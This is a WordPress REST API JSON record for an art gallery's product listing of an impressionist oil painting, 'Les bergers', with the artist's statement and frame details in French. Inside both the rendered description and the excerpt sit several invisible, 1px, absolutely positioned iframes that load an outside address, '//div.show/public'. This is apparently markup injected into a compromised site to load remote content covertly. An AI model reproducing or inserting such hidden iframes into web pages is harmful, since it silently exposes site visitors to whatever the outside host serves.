{"id":5416,"date":"2024-09-07T14:56:44","date_gmt":"2024-09-07T12:56:44","guid":{"rendered":"https:\/\/meskinigallery.com\/?post_type=product&#038;p=5416"},"modified":"2024-09-07T14:58:47","modified_gmt":"2024-09-07T12:58:47","slug":"les-bergers","status":"publish","type":"product","link":"https:\/\/meskinigallery.com\/index.php\/product\/les-bergers\/","title":{"rendered":"Les bergers"},"content":{"rendered":"<p>Titre\u00a0: <b>Les bergers<\/b><\/p>\n<p>Courant artistique\u00a0: <b>L&rsquo;impressionnisme<\/b><\/p>\n<p>Technique\u00a0: <b>Huile sur toile<\/b><\/p>\n<p>Ann\u00e9e\u00a0:<b> 2015<\/b><\/p>\n<p>Lecture de l\u2019artiste\u00a0:<\/p>\n<p><b>\u00ab\u00a0Sc\u00e8nes de bergers avec leurs moutons et les collines qui les entourent. J&rsquo;ai toujours travaill\u00e9 sur ce th\u00e8me qui pour moi est nostalgique. Il me rappelle les prairies dans le monde rural avec un style expressif \u00bb.<\/b><\/p>\n<p><a name=\"_GoBack\"><\/a> Cadre\u00a0: <b>Bois massif, double cadre cuivre vernis<\/b><\/p>\n<p>Signature\u00a0:<b> En bas \u00e0 droite<\/b><\/p>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n","protected":false},"excerpt":{"rendered":"<p>Titre\u00a0: <b>Les bergers<\/b><\/p>\n<p>Courant artistique\u00a0: <b>L&rsquo;impressionnisme<\/b><\/p>\n<p>Technique\u00a0: <b>Huile sur toile<\/b><\/p>\n<p>Ann\u00e9e\u00a0:<b> 2015<\/b><\/p>\n<p>Lecture de l\u2019artiste\u00a0:<\/p>\n<p><b>\u00ab\u00a0Sc\u00e8nes de bergers avec leurs moutons et les collines qui les entourent. J&rsquo;ai toujours travaill\u00e9 sur ce th\u00e8me qui pour moi est nostalgique. Il me rappelle les prairies dans le monde rural avec un style expressif \u00bb.<\/b><\/p>\n<p><a name=\"_GoBack\"><\/a> Cadre\u00a0: <b>Bois massif, double cadre cuivre vernis<\/b><\/p>\n<p>Signature\u00a0:<b> En bas \u00e0 droite<\/b><\/p>\n<div><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n","protected":false},"featured_media":5072,"template":"","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0},"product_brand":[],"product_cat":[40],"product_tag":[],"giftcard-category":[],"class_list":{"0":"post-5416","1":"product","2":"type-product","3":"status-publish","4":"has-post-thumbnail","6":"product_cat-impressionisme","9":"instock","10":"taxable","11":"shipping-taxable","12":"product-type-simple","13":"product-grid-view"},"aioseo_notices":[],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/meskinigallery.com\/index.php\/wp-json\/wp\/v2\/product\/5416","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/meskinigallery.com\/index.php\/wp-json\/wp\/v2\/product"}],"about":[{"href":"https:\/\/meskinigallery.com\/index.php\/wp-json\/wp\/v2\/types\/product"}],"version-history":[{"count":0,"href":"https:\/\/meskinigallery.com\/index.php\/wp-json\/wp\/v2\/product\/5416\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/meskinigallery.com\/index.php\/wp-json\/wp\/v2\/media\/5072"}],"wp:attachment":[{"href":"https:\/\/meskinigallery.com\/index.php\/wp-json\/wp\/v2\/media?parent=5416"}],"wp:term":[{"taxonomy":"product_brand","embeddable":true,"href":"https:\/\/meskinigallery.com\/index.php\/wp-json\/wp\/v2\/product_brand?post=5416"},{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/meskinigallery.com\/index.php\/wp-json\/wp\/v2\/product_cat?post=5416"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/meskinigallery.com\/index.php\/wp-json\/wp\/v2\/product_tag?post=5416"},{"taxonomy":"giftcard-category","embeddable":true,"href":"https:\/\/meskinigallery.com\/index.php\/wp-json\/wp\/v2\/giftcard-category?post=5416"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}